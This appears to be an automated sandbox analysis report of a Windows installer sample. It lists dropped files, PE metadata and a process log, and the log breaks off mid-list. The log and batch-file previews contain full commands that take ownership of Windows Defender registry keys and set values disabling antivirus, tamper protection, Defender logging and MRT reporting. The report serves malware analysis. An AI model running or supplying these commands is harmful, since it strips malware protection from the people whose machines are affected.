            SSDEEP:192:pBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6O:0+
            MD5:24E07246F0E8F5B0029AE7167B667ACE
            SHA1:63F61A2585FF45F17C168BE18164AFDD448773F2
            SHA-256:667E5C9CBE8D6D58E61A2628EBCBD6986D8701AC5670FDA668D999794F0EECF9
            SHA-512:0611BFB6815DDC8D881908BA39F956B21CA99179CF04DCABFDED3B5D98E13C9AFD11B35504DBB9956CBE8F685142ADF6AB5FBD1F3605C316903F4E631AB9DC8F
            Malicious:false
            Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\do64.bat

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):12767
            Entropy (8bit):5.189808508831073
            Encrypted:false
            SSDEEP:192:lBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:QK
            MD5:1ABF8067994181B1A38867BF6437F9D2
            SHA1:D25E23848F65B85F0F21E9A0A69E4268B625ECA2
            SHA-256:23BBB732FF55AB62DC8863A69626EF5655F60BF0D7B96FA2818A895E81283B40
            SHA-512:6237826DE2FEAF63C2F1312680118474F9B60F5516A05E171743A09A088D7C9BFD06CE9DE17852E6F4C2DCB577814163621FF27B2A7BBB37F2A1AE130F64D882
            Malicious:false
            Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\nsExec.dll

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):6656
            Entropy (8bit):4.994818958746835
            Encrypted:false
            SSDEEP:96:f7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNPS3e:zXhHR0aTQN4gRHdMqJVgNPR
            MD5:B38561661A7164E3BBB04EDC3718FE89
            SHA1:F13C873C8DB121BA21244B1E9A457204360D543F
            SHA-256:C2C88E4A32C734B0CB4AE507C1A9A1B417A2375079111FB1B35FAB23AEDD41D9
            SHA-512:FEDCAAC20722DE3519382011CCF22314AF3EDCD11B69F814DB14710966853B69B9B5FC98383EDCDB64D050FF825264EABA27B1C5ADFE61D1FC9D77F13A052CED
            Malicious:false
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...P..Y...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):5120
            Entropy (8bit):4.021609720653415
            Encrypted:false
            SSDEEP:48:6QNc25UQRiRQkbBEQASDMJDp4MiUWf8EFNfCBSfbNtm:NO25UEzkb4yUWfpLzNt
            MD5:02F522632300E14FC1341619E148F7CC
            SHA1:19BD5588F63870D32DA9DDDEDF01D12E6600DF20
            SHA-256:A7AE65AC3B4F68E7BF19A9B379AC7D414A20C5E50476CBEF92B88D8BBEAD54D9
            SHA-512:ED8FB8132B9572FD672DF0632A33FFB6B76A1F0036968D98129DF6FEFD343CEC83204CDCB4FC7F53C0936CB1A2328BEDC866CB7FF20794DDE981D30F4CAFAC76
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 3%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x..d.............................(... ...@....@.. ....................................@..................................(..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......H!..T...........................................................&...(....*...0..........(........(.......r...p(..........(......(.........(.....r...p.(....(....r?..p.(....(....r}..p(....r...p(....s..............o........,...o......+&r...p(....r...p(....r...p(....r...p(......*......s...........X.8..+......(....*BSJB............v2.0.50727......l...X...#~..........#Strings............#US.`.......#GUID...p.......#Blob...........G.........%3................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):239
            Entropy (8bit):5.021036233822738
            Encrypted:false
            SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVazcrfyW3xm
            MD5:F2ECA2D00A9C69AF3E08C55DA5EC8299
            SHA1:5001564F3BFE5CDC60BDA5A14D8AF59105AB97DD
            SHA-256:6FC2543E8CD92F5DB9CAA385B64E5ABAB27D64D4F335B0E0F3A8FE8E87B8F181
            SHA-512:711072383DFB333A6C4ACE51E04C3FAA6B5D712533EEE0B2685DDBD00A45C4213203B62490A435E6F4AABD2F64319A25E71D0C6269E677F3B20EF90E7A98BFFC
            Malicious:false
            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\usibkylp.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):5120
            Entropy (8bit):4.343566574947774
            Encrypted:false
            SSDEEP:48:6gLIWW9gv+H/IxyIARQrGbPXSZIMJjpP2hRNqA3dvpt3UlwNQh+TFWSfbNtm:9bIUFFAirk/Sb2hRN3UOM+9zNt
            MD5:544EF07FC4D277A7D58820880673A4DE
            SHA1:3FFC146DEEF0EFB890DCF813F0664F957A0B2F53
            SHA-256:0DF6807177D8A9285619BB575239B4CF11A4A813989FB27B69AB85694328969D
            SHA-512:D46F273CCF2B2E8AC8D2222AE41F464F266B2F48544C9E2E113D3D6AE04C83DAC1C90DC4C77FA68B786B9BFBC703EF3E85EAC198408E3F4C36471713B7EE1DD6
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h..d.............................)... ...@....@.. ....................................@..................................)..K....@..P....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......L!..T...........................................................&...(....*...0..#.......(.... .........s....(.......(....j*..0..........(........(.......r...p(..........(......(.........(.....r...p.(....(....r?..p.(....(....r}..p(....r...p(....s.......%-.&r...pr...p(.......o....(.........%-.&r...p..(....*..( ...*..BSJB............v2.0.50727......l.......#~......\...#Strings....\.......#US.........#GUID.......L...#Blob...........G.........%3........................ ...

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\usibkylp.exe.config

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):309
            Entropy (8bit):5.021891252558085
            Encrypted:false
            SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAd+LWmtCluyyuQIm:TMHdGGsVazcrfyWd+hyyuxm
            MD5:99BC4155BE42BFF7FBACF63EE97390D9
            SHA1:F26D90583E1027F4F277AC954CE0F8EAD5CDA388
            SHA-256:6420003143A560F7707D70B5027F54FE4AE3C8CB78E993977DFCD40E542DE61E
            SHA-512:82BC4F920A0B3B54C3DBF7F48269748C3099C48FD9B779E705A966255C71A804FB8BE6E36926976DCDD7076A920D26F6A0F79D22BD4941AE9D795256D9EE132C
            Malicious:false
            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup><system.net><defaultProxy useDefaultCredentials="true" /></system.net>..</configuration>..

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):7.997136410806614
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:P196hUN2fw.exe
            File size:3596692
            MD5:e5daf6477340857b1d2d04411d7c0377
            SHA1:064d70629cce898ac26eca755c1f24573d1e6362
            SHA256:99aa0a112de10ceb2072e32e189befed18db5ce294787bf9b2dbe0ef643ba62c
            SHA512:799ca0b2521ce269e846cf65ee0ee9f7a8025d937a56038e2f11c2c7dc79282b1b64cf6ed03e709f9fd1370999dc3fe34734f564a718e10edab9b13689a7eb81
            SSDEEP:98304:IZxnMDp/mWgv8eLZtem6zaPtrnUQ+Ls6pVTEh6XnaVn/tW5X:IZZMD3gvDltebalrUeOokXajWd
            TLSH:CEF5330BFA24BB97E69981B2A9BDCFF0B755E04015269A5B13FCCEFD391849C235C019
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...z..Y.................d...|.....

            File Icon

            Icon Hash:44feb28206060683

            Static PE Info

            General

            Entrypoint:0x4031f1
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x597FCC7A [Tue Aug 1 00:34:02 2017 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:3abe302b6d9a1256e6a915429af4ffd2

            Entrypoint Preview

            Instruction
            sub esp, 00000184h
            push ebx
            push esi
            push edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [esp+18h], ebx
            mov dword ptr [esp+10h], 0040A198h
            mov dword ptr [esp+20h], ebx
            mov byte ptr [esp+14h], 00000020h
            call dword ptr [004080A0h]
            call dword ptr [0040809Ch]
            and eax, BFFFFFFFh
            cmp ax, 00000006h
            mov dword ptr [0042F40Ch], eax
            je 00007F2ADCB8D253h
            push ebx
            call 00007F2ADCB9030Ah
            cmp eax, ebx
            je 00007F2ADCB8D249h
            push 00000C00h
            call eax
            mov esi, 00408298h
            push esi
            call 00007F2ADCB90286h
            push esi
            call dword ptr [00408098h]
            lea esi, dword ptr [esi+eax+01h]
            cmp byte ptr [esi], bl
            jne 00007F2ADCB8D22Dh
            push 0000000Ah
            call 00007F2ADCB902DEh
            push 00000008h
            call 00007F2ADCB902D7h
            push 00000006h
            mov dword ptr [0042F404h], eax
            call 00007F2ADCB902CBh
            cmp eax, ebx
            je 00007F2ADCB8D251h
            push 0000001Eh
            call eax
            test eax, eax
            je 00007F2ADCB8D249h
            or byte ptr [0042F40Fh], 00000040h
            push ebp
            call dword ptr [00408044h]
            push ebx
            call dword ptr [00408288h]
            mov dword ptr [0042F4D8h], eax
            push ebx
            lea eax, dword ptr [esp+38h]
            push 00000160h
            push eax
            push ebx
            push 00429830h
            call dword ptr [00408178h]
            push 0040A188h

            Rich Headers

            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x42a8.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x62540x6400False0.6676171875data6.4338643172916266IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x80000x13540x1400False0.4599609375data5.236269898436511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xa0000x255180x600False0.4557291666666667data4.044625496015545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .ndata0x300000x1b0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x4b0000x42a80x4400False0.40676700367647056data4.7360427408147405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0x4b1f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.38070539419087135
            RT_ICON0x4d7980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.4437148217636023
            RT_ICON0x4e8400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5735815602836879
            RT_DIALOG0x4eca80x100dataEnglishUnited States0.5234375
            RT_DIALOG0x4eda80x11cdataEnglishUnited States0.6056338028169014
            RT_DIALOG0x4eec80x60dataEnglishUnited States0.7291666666666666
            RT_GROUP_ICON0x4ef280x30dataEnglishUnited States0.8333333333333334
            RT_MANIFEST0x4ef580x34bXML 1.0 document, ASCII text, with very long lines (843), with no line terminatorsEnglishUnited States0.5527876631079478

            Imports

            DLLImport
            KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
            USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:13:46:52
            Start date:16/06/2023
            Path:C:\Users\user\Desktop\P196hUN2fw.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\P196hUN2fw.exe
            Imagebase:0x400000
            File size:3596692 bytes
            MD5 hash:E5DAF6477340857B1D2D04411D7C0377
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:1
            Start time:13:46:52
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat
            Imagebase:0x11d0000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:2
            Start time:13:46:52
            Start date:16/06/2023
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7fcd70000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:3
            Start time:13:46:52
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 0%, ReversingLabs
            • Detection: 0%, Virustotal, Browse
            Reputation:low

            General

            Target ID:4
            Start time:13:46:53
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:5
            Start time:13:46:53
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:6
            Start time:13:46:54
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:7
            Start time:13:46:54
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:8
            Start time:13:46:55
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:9
            Start time:13:46:55
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:10
            Start time:13:46:56
            Start date:16/06/2023
            Path:C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe
            Wow64 process (32bit):true
            Commandline:SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
            Imagebase:0x1290000
            File size:526200 bytes
            MD5 hash:93B828ED97CB2C701364DF520DDD5331
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Target ID:11
            Start time:13:46:56
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:12
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:13
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:14
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:15
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:16
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:17
            Start time:13:46:57
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:18
            Start time:13:46:58
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
            Imagebase:0x11e0000
            File size:59392 bytes
            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Target ID:19
            Start time:13:46:58
            Start date:16/06/2023
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
